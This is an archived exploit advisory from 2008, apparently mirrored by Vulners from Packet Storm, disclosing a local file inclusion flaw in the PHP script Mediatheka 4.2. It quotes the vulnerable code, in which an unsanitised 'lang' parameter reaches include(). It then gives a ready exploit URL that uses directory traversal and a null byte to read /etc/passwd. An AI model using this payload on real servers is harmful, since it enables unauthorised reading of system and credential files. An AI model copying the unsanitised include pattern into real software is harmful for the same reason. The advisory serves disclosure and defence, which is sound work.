Lucene search
K

Mediatheka 4.2 Local File Inclusion

🗓️ 15 Dec 2008 00:00:00Reported by OsirysType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 16 Views

Mediatheka 4.2 Local File Inclusion vulnerabilit

Code
`[START]  
  
#########################################################################################  
[0x01] Informations:  
  
Script : Mediatheka 4.2  
Download : http://www.hotscripts.com/jump.php?listing_id=79106&jump_type=1  
Vulnerability : Local File Inclusion  
Author : Osirys  
Contact : osirys[at]live[dot]it  
Notes : Proud to be Italian  
Greets: : XaDoS, x0r, emgent, Jay, str0ke  
  
#########################################################################################  
[0x02] Bug:[Local File Inclusion]  
######  
  
Bugged file is: /[path]/index.php  
  
[CODE]  
  
if(isset($_GET['lang']))  
$lang = $_GET['lang'];  
else  
$lang = 'en';  
include("langs/$lang.php");  
  
[/CODE]  
  
  
[!] EXPLOIT: /[path]/index.php?lang=[local_file_to_include]  
../../../../../../../../../../../etc/passwd%00  
#########################################################################################  
  
[/END]  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Dec 2008 00:00Current
0.1Low risk
Vulners AI Score0.1
16